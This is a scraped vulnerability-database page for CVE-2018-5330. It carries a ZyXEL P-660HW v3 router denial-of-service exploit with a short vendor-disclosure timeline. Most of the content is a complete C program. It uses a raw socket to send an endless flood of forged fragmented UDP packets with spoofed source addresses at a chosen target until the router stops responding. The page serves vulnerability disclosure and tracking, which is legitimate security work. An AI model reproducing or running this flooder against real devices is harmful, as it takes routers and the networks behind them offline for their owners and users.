Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ZyXEL P-660HW UDP Denial Of Service Exploit

🗓️ 13 Jan 2018 00:00:00Reported by Hosein AskariType 
zdt
 zdt🔗 0day.today👁 34 Views

ZyXEL P-660HW v3 UDP Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD		ZyXEL P-660HW Denial of Service Vulnerability (CNVD-2018-04321)
18 Jan 201800:00
cnvd
CVE		CVE-2018-5330
16 Jan 201819:00
cve
Cvelist		CVE-2018-5330
16 Jan 201819:00
cvelist
EUVD		EUVD-2018-17109
7 Oct 202500:30
euvd
NVD		CVE-2018-5330
16 Jan 201819:29
nvd
Packet Storm		ZyXEL P-660HW UDP Denial Of Service
12 Jan 201800:00
packetstorm
Prion		Code injection
16 Jan 201819:29
prion
################
#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service
CVE: CVE-2018-5330
#CWE: CWE-400
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : [email protected]
#description:  ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.
#####################
Vendor status:
[02.01.2018] Vulnerability discovered
[04.01.2018] CVE requestion
[10.01.2018] CVE assigned
[10.01.2018] Contact with the vendor
[11.01.2018] Vendor responds asking for details
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)
[11.01.2018] Vendor assigns appropriate team for coordination
[11.01.2018] Vendor is analyzing the issue
[12.01.2018] Asked vendor for confirmation 
[12.01.2018] Vendor replies with confirmation of the issue
#####################
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define change(n)  (n)
#else 
#define change(n)  htons(n)
#endif
#define ip_1   8193 
#define head     153    
#define u_head    41 
#define level 0
// Exploit Author : Hosein Askar
u_long p_rec(u_char *);
void running(u_char *);
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{
   
    int j = 1, i, socks, counter=1, number=1;
    u_long  s_ip = 0;
    u_long d_ip = 0;
    u_short s_port = 0;
  u_short d_port = 0;
  if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
   {
          perror("Error");
          exit(1);
   }
    if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)
     {
          perror("Error");
          exit(1);
     }
 
    if (argc < 2) running(argv[0]);
    if (!(d_ip = p_rec(argv[1])))
    {
        exit(1);
    }

    fprintf(stderr, "Attack is started \n");

   for (;;) {
      counter ++;
      s_ip = counter*10;
      s_port = counter*10;
      d_port = counter+1*10;
      if (counter>10)
        counter = 1;
      for (i = 0; i < 10; i++)
      {
          fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);
      }
    }
    return (0);
}
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)
{
    u_char *p = NULL, *pointer = NULL;   
    u_char byte;                            
    struct sockaddr_in sin;                 

    sin.sin_family      = AF_INET;
    sin.sin_port        = s_port;
    sin.sin_addr.s_addr = d_ip;

    p = (u_char *)malloc(head + u_head + level);
    pointer  = p;
    
    byte = 69;                       
    memcpy(pointer, &byte, sizeof(u_char));
    pointer += 2;                         
    *((u_short *)pointer) = change(head + u_head + level);    
    pointer += 2;
    *((u_short *)pointer) = htons(number);   
    pointer += 2;
    *((u_short *)pointer) |= change(ip_1);  
    pointer += 2;
    *((u_short *)pointer) = 247;         
    byte = IPPROTO_UDP;
    memcpy(pointer + 1, &byte, sizeof(u_char));
    pointer += 4;                         
    *((u_long *)pointer) = s_ip;        
    pointer += 4;
    *((u_long *)pointer) = d_ip;        
    pointer += 4;
    *((u_short *)pointer) = htons(s_port);       
    pointer += 2;
    *((u_short *)pointer) = htons(d_port);       
    pointer += 2;
    *((u_short *)pointer) = htons(8);
    if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,
                 sizeof(struct sockaddr)) == -1)
     {
         perror("\nsendto");
         free(p);
         exit(1);
     }
    free(p);
}
u_long p_rec(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}
void running(u_char *name)
{
    fprintf(stderr,
            "%s d_ip\n",
            name);
    exit(0);
}
##########################

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jan 2018 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.00595
zyxel p-660hwdenial of serviceudp fragmentation
34